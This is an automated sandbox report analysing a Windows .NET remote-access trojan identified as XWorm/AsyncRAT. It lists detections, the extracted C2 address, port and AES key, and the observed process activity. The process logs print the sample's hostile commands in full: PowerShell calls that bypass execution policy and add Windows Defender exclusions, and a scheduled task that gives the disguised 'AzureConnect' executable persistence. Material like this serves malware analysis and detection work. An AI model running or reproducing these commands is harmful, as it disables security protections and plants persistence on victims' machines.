Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572730
MD5: 2982d11d3b0789476831097f0e213007
SHA1: b2b7d5f73b65c3df4d3da8a5a266f47d3685a044
SHA256: bdff38ae5b6ac3ab4135894064d15e3ab14efe28b9463c98b185fb0cdfd3ad1f
Tags: NET, AsyncRAT, exe, MSIL, user-jstrosch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 3364 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2982D11D3B0789476831097F0E213007)
    • powershell.exe (PID: 1352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6968 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AzureConnect.exe (PID: 1772 cmdline: "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe" MD5: 2982D11D3B0789476831097F0E213007)
  • AzureConnect.exe (PID: 6540 cmdline: "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe" MD5: 2982D11D3B0789476831097F0E213007)
  • cleanup
{"C2 url": ["127.0.0.1", "147.185.221.24"], "Port": 3804, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "xdwdUSB.exe", "Version": "XWorm V5.8"}
Source: file.exe | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: file.exe | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
  • 0x8807:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x88a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x89b9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x82b9:$cnc4: POST / HTTP/1.1
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
  • 0x8807:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x88a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x89b9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x82b9:$cnc4: POST / HTTP/1.1
Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
  • 0x8607:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x86a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x87b9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x80b9:$cnc4: POST / HTTP/1.1
Source: Process Memory Space: file.exe PID: 3364 | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 0.0.file.exe.f20000.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 0.0.file.exe.f20000.0.unpack | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen | Strings:
  • 0x8807:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x88a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x89b9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x82b9:$cnc4: POST / HTTP/1.1

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 1352, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 1352, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 1352, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 1352, ProcessName: powershell.exe
Timestamp: 2024-12-10T19:46:25.070884+0100 | SID: 2855924 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49818 | Destination IP: 147.185.221.24 | Destination Port: 3804 | Protocol: TCP

            AV Detection

Source: file.exe | Avira: detected
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: file.exe | Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "147.185.221.24"], "Port": 3804, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "xdwdUSB.exe", "Version": "XWorm V5.8"}
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | ReversingLabs: Detection: 78%
Source: file.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | String decryptor: 127.0.0.1,147.185.221.24
Source: file.exe | String decryptor: 3804
Source: file.exe | String decryptor: <123456789>
Source: file.exe | String decryptor: <Xwormmm>
Source: file.exe | String decryptor: XWorm V5.8
Source: file.exe | String decryptor: xdwdUSB.exe
Source: file.exe | String decryptor: %ProgramData%
Source: file.exe | String decryptor: Program Files\Microsoft\AzureConnect\AzureConnect.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49818 -> 147.185.221.24:3804
Source: Malware configuration extractor | URLs: 127.0.0.1
Source: Malware configuration extractor | URLs: 147.185.221.24
Source: global traffic | TCP traffic: 192.168.2.5:49797 -> 147.185.221.24:3804
Source: Joe Sandbox View | IP Address: 147.185.221.24
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24
Source: powershell.exe, 0000000A.00000002.2577205128.000002015E5E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000002.00000002.2137614904.000001DB7BB30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros1
Source: powershell.exe, 0000000A.00000002.2572896915.000002015E440000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
Source: powershell.exe, 00000005.00000002.2166015736.0000023991C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000005.00000002.2166015736.0000023991C49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.ctain
Source: powershell.exe, 00000002.00000002.2126110670.000001DB10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221822786.00000239A3851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2354795322.0000023FB0271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2106136819.000001DB00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.0000023993A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.3283038560.0000000003201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2106136819.000001DB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.00000239937E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2106136819.000001DB00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.0000023993A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2137177899.000001DB7BAAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.o
Source: powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2106136819.000001DB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.00000239937E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2371240954.0000023FB85E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.2126110670.000001DB10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221822786.00000239A3851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2354795322.0000023FB0271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

            Operating System Destruction

Source: C:\Users\user\Desktop\file.exe | Process information set: 01 00 00 00

            System Summary

Source: file.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.file.exe.f20000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848F126E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848F18956
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848F19702
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF8490030E9
Source: file.exe, 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAzure.exe4 vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameAzure.exe4 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.file.exe.f20000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: file.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: AzureConnect.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: AzureConnect.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: AzureConnect.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: file.exe, Settings.cs | Base64 encoded string: 'j8FsyUQApJq+6c9MAWZVNdQ0wZQ3bgGH5HE1Z74lJ6SHLteq0/jjszqOv42Ve81S3WlYCNkiLb40hXQ6GtSekQ=='
Source: AzureConnect.exe.0.dr, Settings.cs | Base64 encoded string: 'j8FsyUQApJq+6c9MAWZVNdQ0wZQ3bgGH5HE1Z74lJ6SHLteq0/jjszqOv42Ve81S3WlYCNkiLb40hXQ6GtSekQ=='
Source: file.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: file.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: AzureConnect.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: AzureConnect.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@18/19@0/2
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AzureConnect.exe.log
Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\QECkGQ6BhplKLGAd
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1264:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cu4dy5fs.0e4.ps1
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
Source: unknown | Process created: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
            Source: C:\Users\user\Desktop\file.exe | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (reported twice), uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, sxs.dll, mpr.dll, scrrun.dll, mswsock.dll, wbemcomn.dll, amsi.dll, avicap32.dll, msvfw32.dll, winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (block 1 of 4) | Sections loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (reported twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
